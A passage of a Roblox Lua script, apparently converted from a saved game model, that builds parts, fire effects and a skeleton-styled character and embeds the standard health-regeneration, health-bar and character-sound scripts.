  2978. ["CFrame"] = CFrame.new(-33.4001999, 159.390045, 122.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  2979. ["FormFactor"] = Enum.FormFactor.Symmetric,
  2980. ["Size"] = Vector3.new(1, 2, 2),
  2981. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  2982. ["TopSurface"] = Enum.SurfaceType.Smooth,
  2983. ["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
  2984. })
  2985. o348 = Create("Fire",{
  2986. ["Parent"] = o347,
  2987. ["Size"] = 30,
  2988. ["Color"] = Color3.new(1, 0.788235, 0),
  2989. ["Enabled"] = false,
  2990. ["Heat"] = 25,
  2991. ["SecondaryColor"] = Color3.new(1, 0, 0),
  2992. })
  2993. o349 = Create("Part",{
  2994. ["Name"] = "cylinder base",
  2995. ["Parent"] = o1,
  2996. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  2997. ["Position"] = Vector3.new(-33.9001389, 158.590134, 136.299652),
  2998. ["Anchored"] = true,
  2999. ["CFrame"] = CFrame.new(-33.9001389, 158.590134, 136.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3000. ["FormFactor"] = Enum.FormFactor.Plate,
  3001. ["Size"] = Vector3.new(2, 0.400000006, 2),
  3002. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  3003. ["TopSurface"] = Enum.SurfaceType.Weld,
  3004. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3005. })
  3006. o350 = Create("CylinderMesh",{
  3007. ["Parent"] = o349,
  3008. })
  3009. o351 = Create("Fire",{
  3010. ["Parent"] = o349,
  3011. ["Size"] = 30,
  3012. ["Color"] = Color3.new(0, 0, 1),
  3013. ["Enabled"] = false,
  3014. ["Heat"] = 25,
  3015. ["SecondaryColor"] = Color3.new(1, 1, 1),
  3016. })
  3017. o352 = Create("Part",{
  3018. ["Parent"] = o1,
  3019. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  3020. ["Position"] = Vector3.new(-34.4001999, 159.890045, 136.799652),
  3021. ["Anchored"] = true,
  3022. ["CFrame"] = CFrame.new(-34.4001999, 159.890045, 136.799652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3023. ["FormFactor"] = Enum.FormFactor.Custom,
  3024. ["Size"] = Vector3.new(1, 2.20000005, 1),
  3025. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3026. })
  3027. o353 = Create("SpecialMesh",{
  3028. ["Parent"] = o352,
  3029. ["Scale"] = Vector3.new(1, 1, 0.200000003),
  3030. })
  3031. o354 = Create("Part",{
  3032. ["Parent"] = o1,
  3033. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  3034. ["Position"] = Vector3.new(-33.8588791, 159.860641, 137.014511),
  3035. ["Anchored"] = true,
  3036. ["CFrame"] = CFrame.new(-33.8588791, 159.860641, 137.014511, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3037. ["FormFactor"] = Enum.FormFactor.Custom,
  3038. ["Size"] = Vector3.new(1, 2.20000005, 1),
  3039. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3040. })
  3041. o355 = Create("SpecialMesh",{
  3042. ["Parent"] = o354,
  3043. ["Scale"] = Vector3.new(1, 1, 0.200000003),
  3044. })
  3045. o356 = Create("Part",{
  3046. ["Parent"] = o1,
  3047. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  3048. ["Position"] = Vector3.new(-34.6586838, 159.890045, 136.306503),
  3049. ["Rotation"] = Vector3.new(-0, 2.78203177, -0),
  3050. ["Anchored"] = true,
  3051. ["CFrame"] = CFrame.new(-34.6586838, 159.890045, 136.306503, 0.998821437, 0, 0.0485365354, 0, 1, 0, -0.0485365354, 0, 0.998821437),
  3052. ["FormFactor"] = Enum.FormFactor.Custom,
  3053. ["Size"] = Vector3.new(1, 2.20000005, 1),
  3054. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3055. })
  3056. o357 = Create("SpecialMesh",{
  3057. ["Parent"] = o356,
  3058. ["Scale"] = Vector3.new(1, 1, 0.200000003),
  3059. })
  3060. o358 = Create("Fire",{
  3061. ["Parent"] = o356,
  3062. ["Size"] = 30,
  3063. ["Color"] = Color3.new(0, 0, 1),
  3064. ["Enabled"] = false,
  3065. ["Heat"] = 25,
  3066. ["SecondaryColor"] = Color3.new(1, 1, 1),
  3067. })
  3068. o359 = Create("Part",{
  3069. ["Parent"] = o1,
  3070. ["BrickColor"] = BrickColor.new("Bright green"),
  3071. ["Transparency"] = 1,
  3072. ["Position"] = Vector3.new(-33.9001389, 159.320648, 136.299652),
  3073. ["Anchored"] = true,
  3074. ["CFrame"] = CFrame.new(-33.9001389, 159.320648, 136.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3075. ["Size"] = Vector3.new(2, 1.20000005, 2),
  3076. ["Color"] = Color3.new(0.294118, 0.592157, 0.294118),
  3077. })
  3078. o360 = Create("Fire",{
  3079. ["Parent"] = o359,
  3080. ["Size"] = 3,
  3081. ["Color"] = Color3.new(1, 0.501961, 0),
  3082. ["Heat"] = 16,
  3083. ["SecondaryColor"] = Color3.new(1, 0, 0),
  3084. })
  3085. o361 = Create("Part",{
  3086. ["Name"] = "Light1",
  3087. ["Parent"] = o1,
  3088. ["BrickColor"] = BrickColor.new("Bright yellow"),
  3089. ["Transparency"] = 0.75,
  3090. ["Position"] = Vector3.new(-33.9753189, 159.51268, 136.324081),
  3091. ["Rotation"] = Vector3.new(-2.35306084e-006, 1.56363976e-016, -1.27222189e-014),
  3092. ["Anchored"] = true,
  3093. ["CFrame"] = CFrame.new(-33.9753189, 159.51268, 136.324081, 1, 2.22044605e-016, 2.72906612e-018, 1.77635684e-015, 1, 4.10686596e-008, -1.2242731e-016, -4.10686596e-008, 1),
  3094. ["FormFactor"] = Enum.FormFactor.Plate,
  3095. ["Size"] = Vector3.new(1, 0.400000006, 1),
  3096. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  3097. ["TopSurface"] = Enum.SurfaceType.Smooth,
  3098. ["Color"] = Color3.new(0.960784, 0.803922, 0.188235),
  3099. })
  3100. o362 = Create("SpecialMesh",{
  3101. ["Parent"] = o361,
  3102. ["Scale"] = Vector3.new(2.5, 6, 2.5),
  3103. ["MeshType"] = Enum.MeshType.Sphere,
  3104. })
  3105. o363 = Create("Part",{
  3106. ["Name"] = "Light3",
  3107. ["Parent"] = o1,
  3108. ["BrickColor"] = BrickColor.new("Bright yellow"),
  3109. ["Transparency"] = 0.75,
  3110. ["Position"] = Vector3.new(-33.9838791, 159.746567, 136.313339),
  3111. ["Rotation"] = Vector3.new(-1.70754731e-006, -2.91108701e-018, -6.36110944e-015),
  3112. ["Anchored"] = true,
  3113. ["CFrame"] = CFrame.new(-33.9838791, 159.746567, 136.313339, 1, 1.11022302e-016, -5.08080537e-020, 0, 1, 2.98023224e-008, 4.30582978e-017, -2.98023224e-008, 1),
  3114. ["FormFactor"] = Enum.FormFactor.Plate,
  3115. ["Size"] = Vector3.new(1, 0.400000006, 1),
  3116. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  3117. ["TopSurface"] = Enum.SurfaceType.Smooth,
  3118. ["Color"] = Color3.new(0.960784, 0.803922, 0.188235),
  3119. })
  3120. o364 = Create("SpecialMesh",{
  3121. ["Parent"] = o363,
  3122. ["Scale"] = Vector3.new(5.5, 13, 5.5),
  3123. ["MeshType"] = Enum.MeshType.Sphere,
  3124. })
  3125. o365 = Create("Part",{
  3126. ["Parent"] = o1,
  3127. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  3128. ["Position"] = Vector3.new(-34.4001999, 159.890045, 135.799652),
  3129. ["Anchored"] = true,
  3130. ["CFrame"] = CFrame.new(-34.4001999, 159.890045, 135.799652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3131. ["FormFactor"] = Enum.FormFactor.Custom,
  3132. ["Size"] = Vector3.new(1, 2.20000005, 1),
  3133. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3134. })
  3135. o366 = Create("SpecialMesh",{
  3136. ["Parent"] = o365,
  3137. ["Scale"] = Vector3.new(1, 1, 0.200000003),
  3138. })
  3139. o367 = Create("Fire",{
  3140. ["Parent"] = o365,
  3141. ["Size"] = 30,
  3142. ["Color"] = Color3.new(0, 0, 1),
  3143. ["Enabled"] = false,
  3144. ["Heat"] = 25,
  3145. ["SecondaryColor"] = Color3.new(1, 1, 1),
  3146. })
  3147. o368 = Create("Part",{
  3148. ["Name"] = "Light2",
  3149. ["Parent"] = o1,
  3150. ["BrickColor"] = BrickColor.new("Bright yellow"),
  3151. ["Transparency"] = 0.75,
  3152. ["Position"] = Vector3.new(-33.8771896, 159.801712, 136.323105),
  3153. ["Anchored"] = true,
  3154. ["CFrame"] = CFrame.new(-33.8771896, 159.801712, 136.323105, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3155. ["FormFactor"] = Enum.FormFactor.Plate,
  3156. ["Size"] = Vector3.new(1, 0.400000006, 1),
  3157. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  3158. ["TopSurface"] = Enum.SurfaceType.Smooth,
  3159. ["Color"] = Color3.new(0.960784, 0.803922, 0.188235),
  3160. })
  3161. o369 = Create("SpecialMesh",{
  3162. ["Parent"] = o368,
  3163. ["Scale"] = Vector3.new(4.5, 11, 4.5),
  3164. ["MeshType"] = Enum.MeshType.Sphere,
  3165. })
  3166. o370 = Create("Part",{
  3167. ["Name"] = "cylinder base",
  3168. ["Parent"] = o1,
  3169. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  3170. ["Position"] = Vector3.new(-33.9001389, 161.190109, 136.299652),
  3171. ["Anchored"] = true,
  3172. ["CFrame"] = CFrame.new(-33.9001389, 161.190109, 136.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3173. ["FormFactor"] = Enum.FormFactor.Plate,
  3174. ["Size"] = Vector3.new(2, 0.400000006, 2),
  3175. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  3176. ["TopSurface"] = Enum.SurfaceType.Weld,
  3177. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3178. })
  3179. o371 = Create("CylinderMesh",{
  3180. ["Parent"] = o370,
  3181. })
  3182. o372 = Create("Part",{
  3183. ["Name"] = "cylinder base",
  3184. ["Parent"] = o1,
  3185. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  3186. ["Position"] = Vector3.new(-33.9001389, 161.405197, 136.299652),
  3187. ["Anchored"] = true,
  3188. ["CFrame"] = CFrame.new(-33.9001389, 161.405197, 136.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3189. ["FormFactor"] = Enum.FormFactor.Plate,
  3190. ["Size"] = Vector3.new(2, 0.400000006, 2),
  3191. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  3192. ["TopSurface"] = Enum.SurfaceType.Weld,
  3193. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3194. })
  3195. o373 = Create("CylinderMesh",{
  3196. ["Parent"] = o372,
  3197. ["Scale"] = Vector3.new(1, 0.5, 0.600000024),
  3198. })
  3199. o374 = Create("Part",{
  3200. ["Parent"] = o1,
  3201. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  3202. ["Position"] = Vector3.new(-33.4001999, 159.890045, 136.799652),
  3203. ["Anchored"] = true,
  3204. ["CFrame"] = CFrame.new(-33.4001999, 159.890045, 136.799652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3205. ["FormFactor"] = Enum.FormFactor.Custom,
  3206. ["Size"] = Vector3.new(1, 2.20000005, 1),
  3207. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3208. })
  3209. o375 = Create("SpecialMesh",{
  3210. ["Parent"] = o374,
  3211. ["Scale"] = Vector3.new(1, 1, 0.200000003),
  3212. })
  3213. o376 = Create("Part",{
  3214. ["Parent"] = o1,
  3215. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  3216. ["Position"] = Vector3.new(-33.244133, 159.819489, 136.306503),
  3217. ["Anchored"] = true,
  3218. ["CFrame"] = CFrame.new(-33.244133, 159.819489, 136.306503, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3219. ["FormFactor"] = Enum.FormFactor.Custom,
  3220. ["Size"] = Vector3.new(1, 2.20000005, 1),
  3221. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3222. })
  3223. o377 = Create("SpecialMesh",{
  3224. ["Parent"] = o376,
  3225. ["Scale"] = Vector3.new(1, 1, 0.200000003),
  3226. })
  3227. o378 = Create("Part",{
  3228. ["Parent"] = o1,
  3229. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  3230. ["Position"] = Vector3.new(-33.8654709, 159.876648, 135.569199),
  3231. ["Anchored"] = true,
  3232. ["CFrame"] = CFrame.new(-33.8654709, 159.876648, 135.569199, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3233. ["FormFactor"] = Enum.FormFactor.Custom,
  3234. ["Size"] = Vector3.new(1, 2.20000005, 1),
  3235. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3236. })
  3237. o379 = Create("SpecialMesh",{
  3238. ["Parent"] = o378,
  3239. ["Scale"] = Vector3.new(1, 1, 0.200000003),
  3240. })
  3241. o380 = Create("Part",{
  3242. ["Parent"] = o1,
  3243. ["BrickColor"] = BrickColor.new("Dark stone grey"),
  3244. ["Position"] = Vector3.new(-33.4001999, 159.890045, 135.799652),
  3245. ["Anchored"] = true,
  3246. ["CFrame"] = CFrame.new(-33.4001999, 159.890045, 135.799652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  3247. ["FormFactor"] = Enum.FormFactor.Custom,
  3248. ["Size"] = Vector3.new(1, 2.20000005, 1),
  3249. ["Color"] = Color3.new(0.388235, 0.372549, 0.384314),
  3250. })
  3251. o381 = Create("SpecialMesh",{
  3252. ["Parent"] = o380,
  3253. ["Scale"] = Vector3.new(1, 1, 0.200000003),
  3254. })
  3255. o382 = Create("Model",{
  3256. ["Name"] = "b",
  3257. ["Parent"] = o1,
  3258. ["PrimaryPart"] = o383,
  3259. })
  3260. o383 = Create("Part",{
  3261. ["Name"] = "Head",
  3262. ["Parent"] = o382,
  3263. ["BrickColor"] = BrickColor.new("Bright yellow"),
  3264. ["Position"] = Vector3.new(-31.4027557, 158.880035, 120.296753),
  3265. ["Rotation"] = Vector3.new(89.9998779, -4.23591382e-006, 89.5890961),
  3266. ["RotVelocity"] = Vector3.new(-0.00980091561, -0.0401650555, -0.00170183508),
  3267. ["Velocity"] = Vector3.new(0.0380560681, -0.00086986227, -0.0341398641),
  3268. ["CFrame"] = CFrame.new(-31.4027557, 158.880035, 120.296753, 0.00717169, -0.999974191, -7.39306429e-008, 1.96807378e-006, 3.13295629e-007, -0.999999821, 0.999974191, 0.00717151118, 2.05470155e-006),
  3269. ["FormFactor"] = Enum.FormFactor.Symmetric,
  3270. ["Size"] = Vector3.new(2, 1, 1),
  3271. ["TopSurface"] = Enum.SurfaceType.Smooth,
  3272. ["Color"] = Color3.new(0.960784, 0.803922, 0.188235),
  3273. })
  3274. o384 = Create("Decal",{
  3275. ["Name"] = "face",
  3276. ["Parent"] = o383,
  3277. })
  3278. o385 = Create("SpecialMesh",{
  3279. ["Parent"] = o383,
  3280. ["Scale"] = Vector3.new(1.25, 1.25, 1.25),
  3281. })
  3282. o386 = Create("SpecialMesh",{
  3283. ["Name"] = "SkullMesh",
  3284. ["Parent"] = o383,
  3285. ["MeshId"] = "http://www.roblox.com/asset/?id=4770583",
  3286. ["Scale"] = Vector3.new(3.20000005, 3.20000005, 3.20000005),
  3287. ["TextureId"] = "http://www.roblox.com/asset/?id=36780292",
  3288. ["MeshType"] = Enum.MeshType.FileMesh,
  3289. })
  3290. o387 = Create("Fire",{
  3291. ["Parent"] = o383,
  3292. ["Size"] = 30,
  3293. ["Color"] = Color3.new(0, 0, 1),
  3294. ["Enabled"] = false,
  3295. ["Heat"] = 25,
  3296. ["SecondaryColor"] = Color3.new(0, 0.898039, 1),
  3297. })
  3298. o388 = Create("Part",{
  3299. ["Name"] = "Torso",
  3300. ["Parent"] = o382,
  3301. ["BrickColor"] = BrickColor.new("Bright blue"),
  3302. ["Position"] = Vector3.new(-29.9027939, 158.880035, 120.285995),
  3303. ["Rotation"] = Vector3.new(89.9998856, -8.5377369e-006, 89.5890961),
  3304. ["RotVelocity"] = Vector3.new(-0.00980091561, -0.0401650555, -0.00170183508),
  3305. ["Velocity"] = Vector3.new(0.0384881422, -0.00352798286, 0.0261061862),
  3306. ["CFrame"] = CFrame.new(-29.9027939, 158.880035, 120.285995, 0.00717163086, -0.999974251, -1.49011612e-007, 1.9967556e-006, 2.38418579e-007, -0.99999994, 0.999974251, 0.00717157125, 2.02655792e-006),
  3307. ["FormFactor"] = Enum.FormFactor.Symmetric,
  3308. ["Size"] = Vector3.new(2, 2, 1),
  3309. ["LeftSurface"] = Enum.SurfaceType.Weld,
  3310. ["RightSurface"] = Enum.SurfaceType.Weld,
  3311. ["Color"] = Color3.new(0.0509804, 0.411765, 0.67451),
  3312. })
  3313. o393 = Create("SpecialMesh",{
  3314. ["Parent"] = o388,
  3315. ["MeshId"] = "http://www.roblox.com/asset/?id=36780113",
  3316. ["TextureId"] = "http://www.roblox.com/asset/?id=36780292",
  3317. ["MeshType"] = Enum.MeshType.FileMesh,
  3318. })
  3319. o394 = Create("Fire",{
  3320. ["Parent"] = o388,
  3321. ["Size"] = 30,
  3322. ["Color"] = Color3.new(0, 0, 1),
  3323. ["Enabled"] = false,
  3324. ["Heat"] = 25,
  3325. ["SecondaryColor"] = Color3.new(0, 0.898039, 1),
  3326. })
  3327. o395 = Create("Part",{
  3328. ["Name"] = "Left Arm",
  3329. ["Parent"] = o382,
  3330. ["BrickColor"] = BrickColor.new("Bright yellow"),
  3331. ["Position"] = Vector3.new(-30.344429, 158.880035, 119.285019),
  3332. ["Rotation"] = Vector3.new(90.0002975, 0.000385051913, 172.043503),
  3333. ["RotVelocity"] = Vector3.new(0.00831021462, 0.0191099457, 0.00900206715),
  3334. ["Velocity"] = Vector3.new(-0.0228168592, 0.00135394651, 0.0080116922),
  3335. ["CFrame"] = CFrame.new(-30.344429, 158.880035, 119.285019, -0.990373373, -0.138421208, 6.7204237e-006, -7.36862421e-006, 4.23192978e-006, -0.99999994, 0.138421223, -0.990373433, -5.12599945e-006),
  3336. ["FormFactor"] = Enum.FormFactor.Symmetric,
  3337. ["Size"] = Vector3.new(1, 2, 1),
  3338. ["Color"] = Color3.new(0.960784, 0.803922, 0.188235),
  3339. })
  3340. o396 = Create("SpecialMesh",{
  3341. ["Parent"] = o395,
  3342. ["MeshId"] = "http://www.roblox.com/asset/?id=36780032",
  3343. ["TextureId"] = "http://www.roblox.com/asset/?id=36780292",
  3344. ["MeshType"] = Enum.MeshType.FileMesh,
  3345. })
  3346. o397 = Create("Fire",{
  3347. ["Parent"] = o395,
  3348. ["Size"] = 30,
  3349. ["Color"] = Color3.new(0, 0, 1),
  3350. ["Enabled"] = false,
  3351. ["Heat"] = 25,
  3352. ["SecondaryColor"] = Color3.new(0, 0.898039, 1),
  3353. })
  3354. o398 = Create("Part",{
  3355. ["Name"] = "Right Arm",
  3356. ["Parent"] = o382,
  3357. ["BrickColor"] = BrickColor.new("Bright yellow"),
  3358. ["Position"] = Vector3.new(-29.9565201, 158.880035, 122.035995),
  3359. ["Rotation"] = Vector3.new(-89.9997177, -0.000373952847, 60.5730286),
  3360. ["RotVelocity"] = Vector3.new(-0.00378373358, 0.0316490829, 0.00799832307),
  3361. ["Velocity"] = Vector3.new(0.00857697427, -0.00270672515, 0.0350820348),
  3362. ["CFrame"] = CFrame.new(-29.9565201, 158.880035, 122.035995, 0.491313756, -0.870982587, -6.5267086e-006, 7.4505806e-006, -3.09944153e-006, 0.999999881, -0.870982647, -0.491313666, 5.00679016e-006),
  3363. ["FormFactor"] = Enum.FormFactor.Symmetric,
  3364. ["Size"] = Vector3.new(1, 2, 1),
  3365. ["Color"] = Color3.new(0.960784, 0.803922, 0.188235),
  3366. })
  3367. o399 = Create("SpecialMesh",{
  3368. ["Parent"] = o398,
  3369. ["MeshId"] = "http://www.roblox.com/asset/?id=36780032",
  3370. ["TextureId"] = "http://www.roblox.com/asset/?id=36780292",
  3371. ["MeshType"] = Enum.MeshType.FileMesh,
  3372. })
  3373. o400 = Create("Fire",{
  3374. ["Parent"] = o398,
  3375. ["Size"] = 30,
  3376. ["Color"] = Color3.new(0, 0, 1),
  3377. ["Enabled"] = false,
  3378. ["Heat"] = 25,
  3379. ["SecondaryColor"] = Color3.new(0, 0.898039, 1),
  3380. })
  3381. o401 = Create("Part",{
  3382. ["Name"] = "Left Leg",
  3383. ["Parent"] = o382,
  3384. ["BrickColor"] = BrickColor.new("Br. yellowish green"),
  3385. ["Position"] = Vector3.new(-29.2145767, 158.880035, 118.827988),
  3386. ["Rotation"] = Vector3.new(179.999634, 72.0636826, -89.9996872),
  3387. ["RotVelocity"] = Vector3.new(0.00582741853, -0.11285647, 0.000148370513),
  3388. ["Velocity"] = Vector3.new(-0.0801807716, -0.00118851149, -0.0400859676),
  3389. ["CFrame"] = CFrame.new(-29.2145767, 158.880035, 118.827988, 1.66893005e-006, 0.307959408, 0.951399386, 0.999999881, 1.1920929e-006, -1.96695328e-006, -1.66893005e-006, 0.951399386, -0.307959318),
  3390. ["FormFactor"] = Enum.FormFactor.Symmetric,
  3391. ["Size"] = Vector3.new(1, 2, 1),
  3392. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  3393. ["Color"] = Color3.new(0.643137, 0.741176, 0.278431),
  3394. })
  3395. o402 = Create("SpecialMesh",{
  3396. ["Parent"] = o401,
  3397. ["MeshId"] = "http://www.roblox.com/asset/?id=36780195",
  3398. ["TextureId"] = "http://www.roblox.com/asset/?id=36780292",
  3399. ["MeshType"] = Enum.MeshType.FileMesh,
  3400. })
  3401. o403 = Create("Fire",{
  3402. ["Parent"] = o401,
  3403. ["Size"] = 30,
  3404. ["Color"] = Color3.new(0, 0, 1),
  3405. ["Enabled"] = false,
  3406. ["Heat"] = 25,
  3407. ["SecondaryColor"] = Color3.new(0, 0.898039, 1),
  3408. })
  3409. o404 = Create("Part",{
  3410. ["Name"] = "Right Leg",
  3411. ["Parent"] = o382,
  3412. ["BrickColor"] = BrickColor.new("Br. yellowish green"),
  3413. ["Position"] = Vector3.new(-28.2392349, 158.880035, 121.530136),
  3414. ["Rotation"] = Vector3.new(-89.9999466, -5.12264196e-005, 41.3033791),
  3415. ["RotVelocity"] = Vector3.new(-0.00882853288, 0.0147805847, 0.00380510464),
  3416. ["Velocity"] = Vector3.new(-0.0229148995, -0.00082747126, -0.0115158483),
  3417. ["CFrame"] = CFrame.new(-28.2392349, 158.880035, 121.530136, 0.751225233, -0.660045981, -8.94069672e-007, 1.22189522e-006, 1.1920929e-007, 0.99999994, -0.660045922, -0.751225173, 9.53674316e-007),
  3418. ["FormFactor"] = Enum.FormFactor.Symmetric,
  3419. ["Size"] = Vector3.new(1, 2, 1),
  3420. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  3421. ["Color"] = Color3.new(0.643137, 0.741176, 0.278431),
  3422. })
  3423. o405 = Create("SpecialMesh",{
  3424. ["Parent"] = o404,
  3425. ["MeshId"] = "http://www.roblox.com/asset/?id=36780195",
  3426. ["TextureId"] = "http://www.roblox.com/asset/?id=36780292",
  3427. ["MeshType"] = Enum.MeshType.FileMesh,
  3428. })
  3429. o406 = Create("Fire",{
  3430. ["Parent"] = o404,
  3431. ["Size"] = 30,
  3432. ["Color"] = Color3.new(0, 0, 1),
  3433. ["Enabled"] = false,
  3434. ["Heat"] = 25,
  3435. ["SecondaryColor"] = Color3.new(0, 0.898039, 1),
  3436. })
  3437. o407 = Create("Script",{
  3438. ["Name"] = "Health",
  3439. ["Parent"] = o382,
  3440. })
  3441. table.insert(cors,coroutine.create(function()
  3442. wait()
  3443. runDummyScript(function()
  3444. function waitForChild(parent, childName)
  3445. local child = parent:findFirstChild(childName)
  3446. if child then return child end
  3447. while true do
  3448. child = parent.ChildAdded:wait()
  3449. if child.Name==childName then return child end
  3450. end
  3451. end
  3452.  
  3453. -- declarations
  3454.  
  3455. local Figure = script.Parent
  3456. local Head = waitForChild(Figure, "Head")
  3457. local Humanoid = waitForChild(Figure, "Humanoid")
  3458.  
  3459. -- regeneration
  3460. while true do
  3461. local s = wait(1)
  3462. local health = Humanoid.Health
  3463. if health > 0 and health < Humanoid.MaxHealth then
  3464. health = health + 0.01 * s * Humanoid.MaxHealth
  3465. if health * 1.05 < Humanoid.MaxHealth then
  3466. Humanoid.Health = health
  3467. else
  3468. Humanoid.Health = Humanoid.MaxHealth
  3469. end
  3470. end
  3471. end
  3472.  
  3473. end,o407)
  3474. end))
  3475. o408 = Create("Script",{
  3476. ["Name"] = "HealthScript v2.0",
  3477. ["Parent"] = o382,
  3478. })
  3479. table.insert(cors,coroutine.create(function()
  3480. wait()
  3481. runDummyScript(function()
  3482. local humanoid = script.Parent.Humanoid
  3483.  
  3484. if (humanoid == nil) then
  3485. print("ERROR: no humanoid found in 'HealthScript v2.0'")
  3486. end
  3487.  
  3488.  
  3489. function CreateGUI()
  3490. local p = game.Players:GetPlayerFromCharacter(humanoid.Parent)
  3491. print("Health for Player: " .. p.Name)
  3492. script.HealthGUI.Parent = p.PlayerGui
  3493. end
  3494.  
  3495. function UpdateGUI(health)
  3496. local pgui = game.Players:GetPlayerFromCharacter(humanoid.Parent).PlayerGui
  3497. local tray = pgui.HealthGUI.Tray
  3498.  
  3499. tray.HealthBar.Size = UDim2.new(0.2, 0, 0.8 * (health / humanoid.MaxHealth), 0)
  3500. tray.HealthBar.Position = UDim2.new(0.4, 0, 0.8 * (1- (health / humanoid.MaxHealth)) , 0)
  3501.  
  3502. end
  3503.  
  3504.  
  3505. function HealthChanged(health)
  3506. UpdateGUI(health)
  3507. end
  3508.  
  3509.  
  3510. CreateGUI()
  3511. humanoid.HealthChanged:connect(HealthChanged)
  3512. humanoid.Died:connect(function() HealthChanged(0) end)
  3513. end,o408)
  3514. end))
  3515. o409 = Create("Script",{
  3516. ["Name"] = "Sound",
  3517. ["Parent"] = o382,
  3518. })
  3519. table.insert(cors,coroutine.create(function()
  3520. wait()
  3521. runDummyScript(function()
  3522. -- util
  3523.  
  3524. function waitForChild(parent, childName)
  3525. local child = parent:findFirstChild(childName)
  3526. if child then return child end
  3527. while true do
  3528. child = parent.ChildAdded:wait()
  3529. if child.Name==childName then return child end
  3530. end
  3531. end
  3532.  
  3533. function newSound(id)
  3534. local sound = Instance.new("Sound")
  3535. sound.SoundId = id
  3536. sound.archivable = false
  3537. sound.Parent = script.Parent.Head
  3538. return sound
  3539. end
  3540.  
  3541. -- declarations
  3542.  
  3543. local sDied = newSound("rbxasset://sounds/uuhhh.wav")
  3544. local sFallingDown = newSound("rbxasset://sounds/splat.wav")
  3545. local sFreeFalling = newSound("rbxasset://sounds/swoosh.wav")
  3546. local sGettingUp = newSound("rbxasset://sounds/hit.wav")
  3547. local sJumping = newSound("rbxasset://sounds/button.wav")
  3548. local sRunning = newSound("rbxasset://sounds/bfsl-minifigfoots1.mp3")
  3549. sRunning.Looped = true
  3550.  
  3551. local Figure = script.Parent
  3552. local Head = waitForChild(Figure, "Head")
  3553. local Humanoid = waitForChild(Figure, "Humanoid")
  3554.  
  3555. -- functions
  3556.  
  3557. function onDied()
  3558. sDied:Play()
  3559. end
  3560.  
  3561. function onState(state, sound)
  3562. if state then
  3563. sound:Play()
  3564. else
  3565. sound:Pause()
  3566. end
  3567. end
  3568.  
  3569. function onRunning(speed)
  3570. if speed>0 then
  3571. sRunning:Play()
  3572. else
  3573. sRunning:Pause()
  3574. end
  3575. end
  3576.  
  3577. -- connect up
  3578.  
  3579. Humanoid.Died:connect(onDied)
  3580. Humanoid.Running:connect(onRunning)
  3581. Humanoid.Jumping:connect(function(state) onState(state, sJumping) end)
  3582. Humanoid.GettingUp:connect(function(state) onState(state, sGettingUp) end)
  3583. Humanoid.FreeFalling:connect(function(state) onState(state, sFreeFalling) end)
  3584. Humanoid.FallingDown:connect(function(state) onState(state, sFallingDown) end)
  3585.  
  3586. end,o409)
  3587. end))
  3588. o411 = Create("CharacterMesh",{
  3589. ["Name"] = "Skeleton Left Arm",
  3590. ["Parent"] = o382,
  3591. ["MeshId"] = 36780032,
  3592. ["BodyPart"] = Enum.BodyPart.LeftArm,
  3593. ["OverlayTextureId"] = 36780292,
  3594. })
  3595. o412 = Create("CharacterMesh",{
  3596. ["Name"] = "Skeleton Torso",
  3597. ["Parent"] = o382,
  3598. ["MeshId"] = 36780113,
  3599. ["BodyPart"] = Enum.BodyPart.Torso,
  3600. ["OverlayTextureId"] = 36780292,
  3601. })
  3602. o413 = Create("CharacterMesh",{
  3603. ["Name"] = "Skeleton Right Leg",
  3604. ["Parent"] = o382,
  3605. ["MeshId"] = 36780195,
  3606. ["BodyPart"] = Enum.BodyPart.RightLeg,
  3607. ["OverlayTextureId"] = 36780292,
  3608. })
  3609. o414 = Create("CharacterMesh",{
  3610. ["Name"] = "Skeleton Right Arm",
  3611. ["Parent"] = o382,
  3612. ["MeshId"] = 36780156,
  3613. ["BodyPart"] = Enum.BodyPart.RightArm,
  3614. ["OverlayTextureId"] = 36780292,
  3615. })
  3616. o415 = Create("CharacterMesh",{
  3617. ["Name"] = "Skeleton Left Leg",
  3618. ["Parent"] = o382,
  3619. ["MeshId"] = 36780079,
  3620. ["BaseTextureId"] = 36780292,
  3621. ["BodyPart"] = Enum.BodyPart.LeftLeg,
  3622. ["OverlayTextureId"] = 36780292,
  3623. })
  3624. o416 = Create("Script",{
